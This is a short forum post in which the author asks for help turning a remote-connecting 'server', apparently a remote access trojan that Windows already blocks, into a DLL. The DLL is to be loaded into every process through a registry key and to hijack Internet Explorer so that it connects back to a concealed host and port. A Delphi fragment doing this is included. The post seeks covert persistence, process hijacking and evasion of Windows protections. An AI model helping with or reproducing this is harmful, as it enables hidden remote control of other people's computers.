Hey guys,
Ive completed my formless server, and tested the functions id like to use. However it gets detected by windows and blocks the file. Users will have to unblock it before accessing it, not sure why.
Now, im converting it to a dll and hoping to solve the windows blocking file. What i dont understand is how to call the dll.
Do i have to call the injector every time to start a process, then hijack that process for my server to run?
However, im more interested in this solution, where every application started loads the dll. I simply check whether thats the program i want to hijack or not.
Ive added the location of my server (dll) to the Registry key and added the following to my server:
[PHP]
begin
if paramstr(0) = 'C:\Program Files\Internet Explorer\iexplore.exe' then
begin
Server := TServer.Create;
Host := 'xxxxxxxxxxxx';
Port := 0000
Server.Connect;
end else
begin
ShowMessage (paramstr(0));
end;
end.
[/PHP]
Its not working though, ive tried starting different programs to show the message, tried running iexplore, but the server isnt working. It doesnt seem like the dll has been loading. Is there something im missing? Do i have to create an injector, and create a new process, and hijack it every time?
Thanks


LinkBack URL
About LinkBacks
Reply With Quote